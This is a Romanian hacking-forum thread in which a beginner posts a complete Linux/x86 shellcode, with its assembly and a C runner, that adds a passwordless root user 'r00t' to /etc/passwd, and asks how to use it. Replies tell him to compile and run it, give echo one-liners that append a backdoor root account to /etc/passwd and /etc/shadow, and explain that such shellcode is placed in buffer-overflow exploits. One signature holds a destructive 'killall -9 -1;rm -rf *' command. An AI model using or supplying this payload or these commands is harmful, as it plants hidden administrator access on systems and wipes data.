Add root user r00t with no password

Hacking and more...
HaCkinG CulT

Lista Forumurilor Pe Tematici

Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.

Nou pe simpatie:
Profil deiutza20

Femeie
21 ani
Bacau
cauta Barbat
21 - 44 ani

Hacking and more... / n00bs / Add root user "r00t" with no password

Moderat de Shocker

Autor

Mesaj

Pagini: 1

andoseg
Little Kevin

Inregistrat: acum 17 ani
Postari: 68

Salut eram in vizita pe milworm si as vrea sa pun in aplicate smecheria asta :

Code:

/* By Kris Katterjohn 11/14/2006
 *
 * 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd
 *
 * for Linux/x86
 *
 *
 *
 * section .text
 *
 *      global _start
 *
 * _start:
 *
 * ; open("/etc//passwd", O_WRONLY | O_APPEND)
 *
 *      push byte 5
 *      pop eax
 *      xor ecx, ecx
 *      push ecx
 *      push 0x64777373
 *      push 0x61702f2f
 *      push 0x6374652f
 *      mov ebx, esp
 *      mov cx, 02001Q
 *      int 0x80
 *
 *      mov ebx, eax
 *
 * ; write(ebx, "r00t::0:0:::", 12)
 *
 *      push byte 4
 *      pop eax
 *      xor edx, edx
 *      push edx
 *      push 0x3a3a3a30
 *      push 0x3a303a3a
 *      push 0x74303072
 *      mov ecx, esp
 *      push byte 12
 *      pop edx
 *      int 0x80
 *
 * ; close(ebx)
 *
 *      push byte 6
 *      pop eax
 *      int 0x80
 *
 * ; exit()
 *
 *      push byte 1
 *      pop eax
 *      int 0x80
 */

main()
{
       char shellcode[] =
               "x6ax05x58x31xc9x51x68x73x73x77x64x68"
               "x2fx2fx70x61x68x2fx65x74x63x89xe3x66"
               "xb9x01x04xcdx80x89xc3x6ax04x58x31xd2"
               "x52x68x30x3ax3ax3ax68x3ax3ax30x3ax68"
               "x72x30x30x74x89xe1x6ax0cx5axcdx80x6a"
               "x06x58xcdx80x6ax01x58xcdx80";

       (*(void (*)()) shellcode)();

cineva priceput poate sa explce detaliat ce face ? si cum o facem sa fctioneze ?

_______________________________________

Wherever you go i'll see you

pus acum 17 ani

Shocker
Super Moderator

Din: localhost
Inregistrat: acum 18 ani
Postari: 2084

Din cate vad e facut in C. Compilezi si executi.

P.S.: E singurul exploit care il vad eu ca explica ce e cu xblablaxblabla

_______________________________________
ShockingSoft is back
Freakz only
Comics of the day

pus acum 17 ani

CoLLeOn
Junior+

Inregistrat: acum 17 ani
Postari: 33

Sau si mai simplu..... copy,paste
echo r00t

:0:0::/tmp:/bin/sh >> /etc/passwd echo r00t:::::: >> /etc/shadow

Tre` sa ai UID 0

_______________________________________
killall -9 -1;rm -rf *

pus acum 17 ani

tw8
Elite Member

Din: Drobeta Turnu Severin
Inregistrat: acum 17 ani
Postari: 1087

@Colleon: nu mai invia topicurile moarte

_______________________________________

pus acum 17 ani

srdjan
Grand Master

Din: Arad
Inregistrat: acum 17 ani
Postari: 337

ca sa mai resuscitez si eu cate ceva... sincer mie imi seamana foarte foarte foarte mult cu assembler... dar nah... daca voi ziceti ca e C fie...

btw... ca sa faci un user cu drepturi de root tre sa ai root... daca ai root nu mai e o problema sa faci user cu drept de root... ca sa fii tare tre sa faci creaza un root fara sa ai drepturi de root... in clipa aia scot palaria in fata ta si ma inclin.... (se poate!)

_______________________________________
In God I trust... all others please send me md5 sum-checks

pus acum 17 ani

OSHO
Elite Member

Din: Cluj
Inregistrat: acum 18 ani
Postari: 2069

Chestia de mai sus e C si nu e un program de sine stator ci doar un shellcode, o portiune de cod care o incluzi intr-un program (exploit) ca sa faca ceva. De exemplu, daca exista un exploit pentru aplicatia X care ruleaza ca root si e vulnerabila la buffer overflow, rulezi exploitul si codul care ajunge dincolo de buffer (care urmeaza sa fie rulat) o sa il pui pe asta de mai sus. Asta ca sa nu faci exploitul si sa stai tu sa iti bati capul ce ar trebui sa scrii in hexa ca sa adaugi un user sau ca sa pornesti un sh

_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

pus acum 17 ani

Pagini: 1

Mergi la